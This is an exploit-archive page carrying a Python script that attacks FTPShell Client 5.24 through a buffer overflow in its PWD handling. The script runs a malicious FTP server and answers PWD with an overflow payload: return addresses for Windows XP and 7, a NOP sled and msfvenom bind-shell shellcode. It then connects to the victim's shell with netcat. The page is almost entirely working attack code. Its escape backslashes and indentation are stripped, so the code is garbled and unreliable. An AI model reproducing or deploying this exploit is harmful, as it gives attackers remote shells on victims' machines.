Home / os / winmobile

FTPShell Client 5.24 PWD Remote Buffer Overflow

Posted on 21 November 2016

# -*- coding: utf-8 -*-

# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow
# Date: 16/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com
# Author Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Tested on: Windows XP Professional SP 2
# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit

import socket
import sys
import os
import time

def banner():
banner = "

"
banner += " aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa 
"
banner += " aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
"
banner += " aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa 
"
banner += " aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa 
"
banner += " aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa 
"
banner += " aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa 
"
banner += " 
"
print banner

def usage():
banner()
print "[-] Missing arguments
"
print "[*] Usage: python FTPShell-exploit.py target_os"
print "[*] Target types:
	Windows XP -> winxp
	Windows 7-32bit -> win7_32
	Windows 7-64bit -> win7_64
"
sys.exit(0)

def exploit(target_eip):
s0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s0ck3t.bind(("0.0.0.0", 21))
s0ck3t.listen(5)
print "[*] CT-Zer0 Evil FTP Server Listening port 21
"

# x00x0ax0dx22xff
# msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b 'x00x0ax0dx22xff'
shellcode = ("xbbx61xadx84xdfxdaxccxd9x74x24xf4x5ax33xc9xb1"
"x53x31x5ax12x83xc2x04x03x3bxa3x66x2ax47x53xe4"
"xd5xb7xa4x89x5cx52x95x89x3bx17x86x39x4fx75x2b"
"xb1x1dx6dxb8xb7x89x82x09x7dxecxadx8ax2exccxac"
"x08x2dx01x0ex30xfex54x4fx75xe3x95x1dx2ex6fx0b"
"xb1x5bx25x90x3ax17xabx90xdfxe0xcaxb1x4ex7ax95"
"x11x71xafxadx1bx69xacx88xd2x02x06x66xe5xc2x56"
"x87x4ax2bx57x7ax92x6cx50x65xe1x84xa2x18xf2x53"
"xd8xc6x77x47x7ax8cx20xa3x7ax41xb6x20x70x2exbc"
"x6ex95xb1x11x05xa1x3ax94xc9x23x78xb3xcdx68xda"
"xdax54xd5x8dxe3x86xb6x72x46xcdx5bx66xfbx8cx33"
"x4bx36x2exc4xc3x41x5dxf6x4cxfaxc9xbax05x24x0e"
"xbcx3fx90x80x43xc0xe1x89x87x94xb1xa1x2ex95x59"
"x31xcex40xf7x39x69x3bxeaxc4xc9xebxaax66xa2xe1"
"x24x59xd2x09xefxf2x7bxf4x10xeax63x71xf6x78x84"
"xd7xa0x14x66x0cx79x83x99x66xd1x23xd1x60xe6x4c"
"xe2xa6x40xdax69xa5x54xfbx6dxe0xfcx6cxf9x7ex6d"
"xdfx9bx7fxa4xb7x38xedx23x47x36x0exfcx10x1fxe0"
"xf5xf4x8dx5bxacxeax4fx3dx97xaex8bxfex16x2fx59"
"xbax3cx3fxa7x43x79x6bx77x12xd7xc5x31xccx99xbf"
"xebxa3x73x57x6dx88x43x21x72xc5x35xcdxc3xb0x03"
"xf2xecx54x84x8bx10xc5x6bx46x91xf5x21xcaxb0x9d"
"xefx9fx80xc3x0fx4axc6xfdx93x7exb7xf9x8cx0bxb2"
"x46x0bxe0xcexd7xfex06x7cxd7x2a")

buffer = "A" * 400 + target_eip + "x90" * 40 + shellcode

while True:
victim, addr = s0ck3t.accept()
victim.send("220 CT-Zer0 Evil FTP Service
")
print "[*] Connection accepted from %s
" % addr[0]
while True:
data = victim.recv(1024)
if "USER" in data:
victim.send("331 User name okay, need password

")
print "	[+] 331 USER = %s" % data.split(" ")[1],
elif "PASS" in data:
victim.send("230 Password accepted.
230 User logged in.
")
print "	[+] 230 PASS = %s" % data.split(" ")[1],
elif "PWD" in data:
victim.send('257 "' + buffer + '" is current directory
')
print "	[+] 257 PWD"
print "
[*] Exploit Sent Successfully
"
time.sleep(2)
print '[+] You got bind shell on port 5656
'
os.system('nc ' + str(addr[0]) + ' 5656')

if len(sys.argv) != 2:
usage()
else:
banner()
try:
if sys.argv[1] == "winxp":
# 7C80C75B JMP EBP kernel32.dll
target_eip = "x5BxC7x80x7C"
elif sys.argv[1] == "win7_32":
# 76ad0299 jmp ebp [kernel32.dll]
target_eip = "x99x02xADx76"
elif sys.argv[1] == "win7_64":
# 7619dfce jmp ebp [kernel32.dll]
target_eip = "xCExDFx19x76"
else:
usage()
exploit(target_eip)
except:
print "
[O_o] KTHXBYE! [O_o]"

 

TOP

Malware :

Exploits :